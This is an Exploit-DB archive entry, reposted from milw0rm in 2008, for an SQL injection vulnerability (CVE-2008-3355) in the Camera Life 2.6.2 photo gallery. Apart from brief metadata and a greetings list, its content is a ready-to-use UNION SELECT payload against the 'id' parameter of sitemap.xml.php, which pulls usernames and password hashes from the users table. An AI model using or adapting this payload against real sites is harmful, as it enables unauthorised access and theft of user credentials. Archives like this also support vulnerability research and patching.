Camera Life 2.6.2 id Remote SQL Injection Vulnerability

2008-07-25T00:00:00
ID EDB-ID:6132
Type exploitdb
Reporter nuclear
Modified 2008-07-25T00:00:00

Description

Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability. CVE-2008-3355. Webapps exploit for php platform

                                        
                                            #Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]